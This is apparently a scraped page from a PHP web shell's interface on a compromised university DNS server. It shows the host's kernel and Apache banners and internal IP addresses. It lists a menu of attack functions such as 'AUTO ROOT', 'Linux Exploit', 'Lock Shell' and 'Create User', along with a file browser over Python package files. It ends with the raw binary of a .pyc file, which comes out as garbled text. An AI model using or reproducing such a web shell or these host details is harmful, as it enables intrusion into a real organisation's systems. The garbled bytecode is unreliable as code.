Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
xdg /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
BaseDirectory.cpython-310.pyc
5.19
KB
-rw-r--r--
Config.cpython-310.pyc
1.16
KB
-rw-r--r--
DesktopEntry.cpython-310.pyc
16.02
KB
-rw-r--r--
Exceptions.cpython-310.pyc
3.43
KB
-rw-r--r--
IconTheme.cpython-310.pyc
12.58
KB
-rw-r--r--
IniFile.cpython-310.pyc
9.45
KB
-rw-r--r--
__init__.cpython-310.pyc
1.64
KB
-rw-r--r--
Locale.cpython-310.pyc
1.58
KB
-rw-r--r--
Menu.cpython-310.pyc
27.83
KB
-rw-r--r--
MenuEditor.cpython-310.pyc
13.41
KB
-rw-r--r--
Mime.cpython-310.pyc
22.68
KB
-rw-r--r--
RecentFiles.cpython-310.pyc
5.39
KB
-rw-r--r--
util.cpython-310.pyc
1.93
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : util.cpython-310.pyc
o �)X� � @ sr d dl Z e jd dkZerdd� Zndd� Zz d dlmZ W dS ey8 d dlZejej B dfdd�ZY dS w ) � N� c C s | S �N� ��sr r �*/usr/lib/python3/dist-packages/xdg/util.py�u s r c C s | � d�S )Nzutf-8)�decoder r r r r s )�whichc s dd� }t j�� �r|� |�r� S dS |pt j�dt j��t j�}tj dkrVt j |vr2|�dt j � t j�dd��t j�}t� fd d �|D ��rL� g}n � fdd�|D �}n� g}t � }|D ](}t j�|�}||vr�|�|� |D ]} t j�|| �} || |�r�| S qqq^dS ) aK Given a command, mode, and a PATH string, return the path which conforms to the given mode on the PATH, or None if there is no such file. `mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result of os.environ.get("PATH"), or can be overridden with a custom search path. c S s&